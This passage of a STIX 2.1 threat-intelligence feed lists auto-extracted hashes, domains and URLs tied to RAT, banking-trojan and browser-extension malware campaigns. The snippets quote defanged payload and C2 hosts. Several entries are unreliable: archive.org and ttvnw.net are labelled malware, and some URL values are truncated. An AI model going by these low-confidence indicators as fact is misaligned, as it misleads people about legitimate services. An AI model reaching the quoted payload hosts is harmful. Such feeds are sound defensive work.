and Chrome Hijacker\" (Cyber Security News). Context: Trex.zip , archive extracted from the bitmap payload SHA256 b367762140ae7f5098230b8a5da738c9241f286281ec9439dd6ca581fc87989c wscl.exe , ARKTunnel WebSocket tunneling RAT SHA256 d8d783f","pattern":"[file:hashes.'SHA-256' = 'b367762140ae7f5098230b8a5da738c9241f286281ec9439dd6ca581fc87989c']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a7a74a14-92a0-4dd6-9ae1-20816a150b52","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: ceb30a5eb9ad9d9c6712c80726df16f96f99d9fc0753be241b00b4d636eb576e","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: .dll , PowerShell downloader for Insomnia RAT stages SHA256 ceb30a5eb9ad9d9c6712c80726df16f96f99d9fc0753be241b00b4d636eb576e t.ps1 , Insomnia RAT PowerShell loader SHA256 cf184d04ca31f","pattern":"[file:hashes.'SHA-256' = 'ceb30a5eb9ad9d9c6712c80726df16f96f99d9fc0753be241b00b4d636eb576e']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a3f02b9e-b140-4436-bcf0-964edbc66e3d","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: cf184d04ca31fb2b6b7efd85399c29c1136b539153e137ceb3877b1b905791de","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: 0b4d636eb576e t.ps1 , Insomnia RAT PowerShell loader SHA256 cf184d04ca31fb2b6b7efd85399c29c1136b539153e137ceb3877b1b905791de Python component of the Insomnia RAT dual payload SHA256 62","pattern":"[file:hashes.'SHA-256' = 'cf184d04ca31fb2b6b7efd85399c29c1136b539153e137ceb3877b1b905791de']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--485508a7-caed-4fd7-bf80-a3029ac72785","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: d8d783f8e050a6e394f3c0aa5e2bc73a38d822e55fbc39c0648cbff566de3cdf","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: c87989c wscl.exe , ARKTunnel WebSocket tunneling RAT SHA256 d8d783f8e050a6e394f3c0aa5e2bc73a38d822e55fbc39c0648cbff566de3cdf Resource icon shared across ARKTunnel samples SHA256 06e0af","pattern":"[file:hashes.'SHA-256' = 'd8d783f8e050a6e394f3c0aa5e2bc73a38d822e55fbc39c0648cbff566de3cdf']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--438ae98f-f8b1-452e-921d-ddf85c8944b6","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: e05bc22afbc5ddd50b49c85ee169dd13318000d38286de2b8bcff98217256a8d","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: 90b4560f1 eld1.exe , ARKTunnel steganography dropper SHA256 e05bc22afbc5ddd50b49c85ee169dd13318000d38286de2b8bcff98217256a8d procorTrex.zip , archive extracted from the bitmap payload","pattern":"[file:hashes.'SHA-256' = 'e05bc22afbc5ddd50b49c85ee169dd13318000d38286de2b8bcff98217256a8d']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d0217139-cb22-4dd5-be4f-79540ff4ce4e","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: fc485882626512e7ff82a1d7cd8e8fb3e9751b026d97e682d6908aefff1f2d73","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: fferLoader installer delivered through SEO poisoning SHA256 fc485882626512e7ff82a1d7cd8e8fb3e9751b026d97e682d6908aefff1f2d73 windirstat.tmp unpacked OfferLoader stage SHA256 3052bd320a","pattern":"[file:hashes.'SHA-256' = 'fc485882626512e7ff82a1d7cd8e8fb3e9751b026d97e682d6908aefff1f2d73']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a3f1751b-e5c8-48c7-b989-b4afa8c64909","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: fdcc95b7791c0d6590dcf1a412dc9fcc92ad2095818d1b78368b31efad012007","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: c15bab72104 eld2.tmp , unpacked Docro Hijacker stage SHA256 fdcc95b7791c0d6590dcf1a412dc9fcc92ad2095818d1b78368b31efad012007 Adblock.dll , Chrome Secure Preferences bypass DLL File nam","pattern":"[file:hashes.'SHA-256' = 'fdcc95b7791c0d6590dcf1a412dc9fcc92ad2095818d1b78368b31efad012007']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c6c6e4b4-9f64-471c-9c21-746c7e45b686","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"url: http://aa.amazingshield[","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: per[.]info/aa.js Stage-three Node.js Insomnia RAT agent URL hxxp[:]//aa.amazingshield[.]xyz/33244556546.py Stage-three Python Insomnia RAT agent","pattern":"[url:value = 'http://aa.amazingshield[']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--42ed8d70-2c7d-4038-ad9b-750465a97cb5","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"url: https://drelto[","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: yz/33244556546.py Stage-three Python Insomnia RAT agent URL hxxps[:]//drelto[.]info/farlix Search-result injection script host Domain s","pattern":"[url:value = 'https://drelto[']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9c1209e6-1453-4075-a6a0-65a7936511c8","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"url: https://stryper[","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: sHelper\\docro\\ Docro Chrome extension installation path URL hxxps[:]//stryper[.]info/t.ps1 Stage-two PowerShell installer for Insomnia R","pattern":"[url:value = 'https://stryper[']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4b54dbf1-5431-46e2-935e-3150f297c998","created":"2026-09-14T07:24:39.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: ttvnw.net","description":"Seen in \"Malicious Twitch Browser Extension Leaks OAuth Tokens From Nearly 31,000 Users\" (The Hacker News). Context: es so by routing Twitch's video-playlist requests to \"usher.ttvnw[.]net\" through operator-controlled proxy servers along with the","pattern":"[domain-name:value = 'ttvnw.net']","pattern_type":"stix","valid_from":"2026-09-14T07:24:39.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/malicious-twitch-browser-extension.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3fa992e0-1400-4b7e-a932-68c735226f94","created":"2026-09-14T05:56:58.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: 128.200.178.68.host.secureserver.net","description":"Seen in \"Casbaneiro Banking Trojan Uses Distributed C2 Servers to Evade Detection and Target Bank Users\" (GBHackers). Context: 94ad5dcd271aa86f08cb2b8374203ecc67015af7ca6057244390 Domain 128[.]200[.]178[.]68[.]host[.]secureserver[.]net Domain 13[.]189[.]202[.]64[.]host[.]secureserve","pattern":"[domain-name:value = '128.200.178.68.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T05:56:58.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c86a42fd-6d38-4963-97ed-74eabe28dfd4","created":"2026-09-14T05:56:58.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: 13.189.202.64.host.secureserver.net","description":"Seen in \"Casbaneiro Banking Trojan Uses Distributed C2 Servers to Evade Detection and Target Bank Users\" (GBHackers). Context: ain 128[.]200[.]178[.]68[.]host[.]secureserver[.]net Domain 13[.]189[.]202[.]64[.]host[.]secureserver[.]net IP address 72[.]167[.]48[.]63 IP address 209[.]","pattern":"[domain-name:value = '13.189.202.64.host.secureserver.net']","pattern_type":"stix","valid_from":"2026-09-14T05:56:58.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--35bcc70f-3075-4b87-8a80-d3b52c896fa7","created":"2026-09-14T05:56:58.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 40d253480f752805e58c21266e40afe99afc96feea0d355732af5bea459db1dd","description":"Seen in \"Casbaneiro Banking Trojan Uses Distributed C2 Servers to Evade Detection and Target Bank Users\" (GBHackers). Context: 76409f69d445a93910964f8db457bafafb97a011da59e73 PDF SHA-256 40d253480f752805e58c21266e40afe99afc96feea0d355732af5bea459db1dd Email SHA-256 debe871710268e7bb770b72c6772f2e0b8bd40a22b2ea","pattern":"[file:hashes.'SHA-256' = '40d253480f752805e58c21266e40afe99afc96feea0d355732af5bea459db1dd']","pattern_type":"stix","valid_from":"2026-09-14T05:56:58.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f4a4d5c0-f827-4500-b48d-27ad838a2334","created":"2026-09-14T05:56:58.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 6bb4372d0d02ec87b76409f69d445a93910964f8db457bafafb97a011da59e73","description":"Seen in \"Casbaneiro Banking Trojan Uses Distributed C2 Servers to Evade Detection and Target Bank Users\" (GBHackers). Context: o financial websites. IOCs Indicator type Value PDF SHA-256 6bb4372d0d02ec87b76409f69d445a93910964f8db457bafafb97a011da59e73 PDF SHA-256 40d253480f752805e58c21266e40afe99afc96feea0d355","pattern":"[file:hashes.'SHA-256' = '6bb4372d0d02ec87b76409f69d445a93910964f8db457bafafb97a011da59e73']","pattern_type":"stix","valid_from":"2026-09-14T05:56:58.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--53be5a58-2706-4827-939a-288f7bebe0b4","created":"2026-09-14T05:56:58.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: debe871710268e7bb770b72c6772f2e0b8bd40a22b2eabf4b6556eaba2d71057","description":"Seen in \"Casbaneiro Banking Trojan Uses Distributed C2 Servers to Evade Detection and Target Bank Users\" (GBHackers). Context: c21266e40afe99afc96feea0d355732af5bea459db1dd Email SHA-256 debe871710268e7bb770b72c6772f2e0b8bd40a22b2eabf4b6556eaba2d71057 Email SHA-256 eaec8c6950f394ad5dcd271aa86f08cb2b8374203ecc6","pattern":"[file:hashes.'SHA-256' = 'debe871710268e7bb770b72c6772f2e0b8bd40a22b2eabf4b6556eaba2d71057']","pattern_type":"stix","valid_from":"2026-09-14T05:56:58.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--358cfca1-cfe3-4063-9c1e-63cf8bafaa3a","created":"2026-09-14T05:56:58.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: eaec8c6950f394ad5dcd271aa86f08cb2b8374203ecc67015af7ca6057244390","description":"Seen in \"Casbaneiro Banking Trojan Uses Distributed C2 Servers to Evade Detection and Target Bank Users\" (GBHackers). Context: 0b72c6772f2e0b8bd40a22b2eabf4b6556eaba2d71057 Email SHA-256 eaec8c6950f394ad5dcd271aa86f08cb2b8374203ecc67015af7ca6057244390 Domain 128[.]200[.]178[.]68[.]host[.]secureserver[.]net Dom","pattern":"[file:hashes.'SHA-256' = 'eaec8c6950f394ad5dcd271aa86f08cb2b8374203ecc67015af7ca6057244390']","pattern_type":"stix","valid_from":"2026-09-14T05:56:58.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/casbaneiro-banking-trojan/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--68795850-0554-4ae6-8bc2-5b47254af246","created":"2026-09-14T05:24:48.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 15700817e517fefcabc0291e350daf3e10d52f6b24de07b4e2396843a671adda","description":"Seen in \"AsyncRAT Malware Abuses AutoIt and PowerShell to Hide Inside Legitimate Windows Process\" (GBHackers). Context: 122ea3cbcb99c8a525b0b30ab985bc8e375c7a 3200000_02C37000.exe 15700817e517fefcabc0291e350daf3e10d52f6b24de07b4e2396843a671adda Note: IP addresses and domains are intentionally defanged (","pattern":"[file:hashes.'SHA-256' = '15700817e517fefcabc0291e350daf3e10d52f6b24de07b4e2396843a671adda']","pattern_type":"stix","valid_from":"2026-09-14T05:24:48.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/asyncrat-in-hides-windows-process/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f0621f8e-2c5c-48d4-b5a2-3f19c496783b","created":"2026-09-14T05:24:48.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 22678bf501fee4baeef297bd2f122ea3cbcb99c8a525b0b30ab985bc8e375c7a","description":"Seen in \"AsyncRAT Malware Abuses AutoIt and PowerShell to Hide Inside Legitimate Windows Process\" (GBHackers). Context: d5f4a1185bf5259110bcf96cc3f0c740e7cf217bfb89a0c 3200000.exe 22678bf501fee4baeef297bd2f122ea3cbcb99c8a525b0b30ab985bc8e375c7a 3200000_02C37000.exe 15700817e517fefcabc0291e350daf3e10d52f","pattern":"[file:hashes.'SHA-256' = '22678bf501fee4baeef297bd2f122ea3cbcb99c8a525b0b30ab985bc8e375c7a']","pattern_type":"stix","valid_from":"2026-09-14T05:24:48.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/asyncrat-in-hides-windows-process/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ef37ea25-df27-48df-aa92-80f4dc26a8e2","created":"2026-09-14T05:24:48.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 4affb923504ddf5fdd5f4a1185bf5259110bcf96cc3f0c740e7cf217bfb89a0c","description":"Seen in \"AsyncRAT Malware Abuses AutoIt and PowerShell to Hide Inside Legitimate Windows Process\" (GBHackers). Context: 1fd4d0ce0cce0e1d7be82f3c28eeea62ed5b9b0bea3450a6 kojuyn.ini 4affb923504ddf5fdd5f4a1185bf5259110bcf96cc3f0c740e7cf217bfb89a0c 3200000.exe 22678bf501fee4baeef297bd2f122ea3cbcb99c8a525b0b","pattern":"[file:hashes.'SHA-256' = '4affb923504ddf5fdd5f4a1185bf5259110bcf96cc3f0c740e7cf217bfb89a0c']","pattern_type":"stix","valid_from":"2026-09-14T05:24:48.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/asyncrat-in-hides-windows-process/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e3eb77a7-7225-4283-acff-ec9ba4d8d185","created":"2026-09-14T05:24:48.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: ae4144ff75a9b6371fd4d0ce0cce0e1d7be82f3c28eeea62ed5b9b0bea3450a6","description":"Seen in \"AsyncRAT Malware Abuses AutoIt and PowerShell to Hide Inside Legitimate Windows Process\" (GBHackers). Context: Cs Filename SHA-256 Right-click to open Invoice Details.bat ae4144ff75a9b6371fd4d0ce0cce0e1d7be82f3c28eeea62ed5b9b0bea3450a6 kojuyn.ini 4affb923504ddf5fdd5f4a1185bf5259110bcf96cc3f0c74","pattern":"[file:hashes.'SHA-256' = 'ae4144ff75a9b6371fd4d0ce0cce0e1d7be82f3c28eeea62ed5b9b0bea3450a6']","pattern_type":"stix","valid_from":"2026-09-14T05:24:48.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/asyncrat-in-hides-windows-process/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d207dc9d-2c71-451a-ae5c-bc48fc0722ad","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: archive.org","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: 35a1ca0987/{campaignId} .NET PE Injector sub-module hxxps://archive[.]org/download/hotelmoskva/hotelmoskva.jpg SentinelMemoryScanne","pattern":"[domain-name:value = 'archive.org']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--49ef3be5-2b05-4747-9451-e6bcefce22ab","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: connection.upgradeonline.site","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: passing the campaign ID. In this sample, the URL is hxxps://connection[.]upgradeonline[.]site . Loader beacons to C2 Second stage: persistence and th","pattern":"[domain-name:value = 'connection.upgradeonline.site']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6de20e9c-1731-4471-9385-3e7da7cdd66c","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: granderevolucao.store","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: licious browser extension installer payload main-v2 hxxps://granderevolucao[.]store/5c92d3b8734b4f498752f735a1ca0987/{campaignId} .NET PE Inj","pattern":"[domain-name:value = 'granderevolucao.store']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b053f439-a470-4f12-abae-d3a8e124fdd4","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: ia601808.us.archive.org","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: legit SentinelOne binary for side-loading sentinel hxxps://ia601808[.]us[.]archive[.]org/5/items/sentinel_20260722_0435/Sentinel.jpg After the","pattern":"[domain-name:value = 'ia601808.us.archive.org']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3fb069c5-f452-4401-9e10-523c605f9d64","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: volmira.site","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: abA6740d07b . The extension and main-v2 parameters returned volmira[.]site and zaviro[.]online , respectively. Notably, the main-v2","pattern":"[domain-name:value = 'volmira.site']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--adc134c0-45e8-4b63-85ca-9e3a9ea32635","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: www.creamp1eonlyfans.net","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: ting to download a page from the unregistered domain hxxp://www[.]creamp1eonlyfans[.]net . Because this domain should not return any content, a","pattern":"[domain-name:value = 'www.creamp1eonlyfans.net']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fd08d103-c7ba-4764-aecb-48729dbb8084","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"domain: zaviro.online","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: xtension and main-v2 parameters returned volmira[.]site and zaviro[.]online , respectively. Notably, the main-v2 value was updated on","pattern":"[domain-name:value = 'zaviro.online']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cebd07a4-8525-4650-8df7-b51a46045159","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"md5: 5c92d3b8734b4f498752f735a1ca0987","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: n installer payload main-v2 hxxps://granderevolucao[.]store/5c92d3b8734b4f498752f735a1ca0987/{campaignId} .NET PE Injector sub-module hxxps://archive[.]","pattern":"[file:hashes.MD5 = '5c92d3b8734b4f498752f735a1ca0987']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b8df8080-f112-4459-a891-0d921c6ff466","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 106eac79396a3ff77b8f375c391260ce422be2ae4d55d3aa75b2635cbdc0fa42","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: tection For this analysis, we examine the following script: 106eac79396a3ff77b8f375c391260ce422be2ae4d55d3aa75b2635cbdc0fa42 . The obfuscation is fairly basic: function names are repla","pattern":"[file:hashes.'SHA-256' = '106eac79396a3ff77b8f375c391260ce422be2ae4d55d3aa75b2635cbdc0fa42']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fe753f5e-1707-4e2e-b054-02c3f31260b6","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: 5ece7fd3766b0b7f8aadefa562313cea6c3c94f9398658dd389910e5be44f552","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: ful pivot for finding additional first-stage samples (e.g., 5ece7fd3766b0b7f8aadefa562313cea6c3c94f9398658dd389910e5be44f552 ). The sandbox-detection heuristic consists of two checks.","pattern":"[file:hashes.'SHA-256' = '5ece7fd3766b0b7f8aadefa562313cea6c3c94f9398658dd389910e5be44f552']","pattern_type":"stix","valid_from":"2026-09-14T00:00:00.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Elastic Security Labs","url":"https://www.elastic.co/security-labs/threat-command/malicious-browser-extension-kremlin-banking-malware"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3df60f03-3a66-462f-b9eb-abdd104b053d","created":"2026-09-14T00:00:00.000Z","modified":"2026-09-15T22:15:20.128Z","created_by_ref":"identity--1baf73a7-efd3-42cb-8223-38b5328630f5","name":"sha256: c8c38634dd44d7c6162c66174a6ee23ee404265125166e8d757681bdd66a4268","description":"Seen in \"The extension you never installed: KREMLIN forges Chrome's own integrity checks to steal banking sessions\" (Elastic Security Labs). Context: ugging. For this analysis, we examine the following binary: c8c38634dd44d7c6162c66174a6ee23ee404265125166e8d757681bdd66a4268 . KREMLIN string decryption 